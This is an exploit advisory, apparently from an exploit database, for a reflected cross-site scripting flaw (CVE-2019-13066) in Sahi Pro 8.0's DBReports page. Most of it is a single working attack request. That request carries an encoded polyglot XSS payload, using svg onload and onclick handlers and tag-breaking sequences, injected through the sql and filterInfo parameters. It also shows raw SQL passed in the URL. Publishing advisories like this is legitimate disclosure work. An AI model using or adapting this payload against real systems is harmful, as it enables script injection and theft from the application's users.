# Exploit Title: Sahi pro (8.x ) Reflected XSS

# Date: 17-06-2019

# Exploit Author: x00pwn

# Vendor Homepage:https://sahipro.com/

# Software Link:https://sahipro.com/downloads-archive/

# Version: 8.0

# Tested on: Linux Ubuntu / Windows 7

# CVE :  CVE-2019-13066

POC - The Sahi pro web-application has a script manager arena located athttp://examplesite:9999/_s_/dyn/pro/DBReports which has many different areas that are vulnerable to reflected XSS, by updating a scripts "Script Name", "Suite Name", "Base URL", "Android", "iOS", "Scripts Run", "Origin Machine", or "Comment", and attacker can trigger the reflected XSS.

The malicious request that is sent to the application -

GET /_s_/dyn/pro/DBReports?sql=SELECT%20SUITEREPORTS.SUITESTATUS%20AS%20ROWSTATUS%2C%20SUITEREPORTS.*%20FROM%20SUITEREPORTS%20WHERE%20PARENTSUITEID%20IS%20NULL%20AND%20SUITEREPORTS.SUITENAME%20LIKE%20%27%25%2F*-%2F*%60%2F*%5C%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert(%22Reflect_XSS_Vulnerable%22)%2F%2F%3E%5Cx3e%25%27%20%2F*ORDERBYSTART*%2F%20ORDER%20BY%20SUITEREPORTS.STARTTIME%20DESC%20%2F*ORDERBYEND*%2F%20%2F*LIMITSTART*%2F%20LIMIT%200%2C%2050%2F*LIMITEND*%2F&filterInfo=showTCSummaryKey%3A%3A%3Afalse---pageNumInfo%3A%3A%3A1---graphs%3A%3A%3Adisabled---useSQL%3A%3A%3Afalse---pass_threshold%3A%3A%3A100---filter_top_flt%3A%3A%3A50---fileType%3A%3A%3A---%3A%3A%3A50---%3A%3A%3A1---script_name_flt%3A%3A%3A---suite_name_flt%3A%3A%3A%2F*-%2F*%60%2F*%5C%60%2F*%27%2F*%22%2F**%2F(%2F*%20*%2FoNcliCk%3Dalert()%20)%2F%2F%250D%250A%250d%250a%2F%2F%3C%2FstYle%2F%3C%2FtitLe%2F%3C%2FteXtarEa%2F%3C%2FscRipt%2F--!%3E%5Cx3csVg%2F%3CsVg%2FoNloAd%3Dalert(%22Reflect_XSS_Vulnerable%22)%2F%2F%3E%5Cx3e---base_url_flt%3A%3A%3A---browser_name_flt%3A%3A%3A---android_name_flt%3A%3A%3A---ios_name_flt%3A%3A%3A---range_flt%3A%3A%3A---from_flt%3A%3A%3Ayyyy-mm-dd---to_flt%3A%3A%3Ayyyy-mm-dd---time_taken_flt%3A%3A%3A00%3A00%3A00%20000---scripts_run_flt%3A%3A%3A---passed_scripts_flt%3A%3A%3A---failed_scripts_flt%3A%3A%3A---skipped_scripts_flt%3A%3A%3A---aborted_scripts_flt%3A%3A%3A---notSupported_scripts_flt%3A%3A%3A---passed_flt%3A%3A%3A---failed_flt%3A%3A%3A---status_flt%3A%3A%3A---machineName_flt%3A%3A%3A---comment_flt%3A%3A%3A---pass_threshold%3A%3A%3A100&pageNumber=1&pageSize=50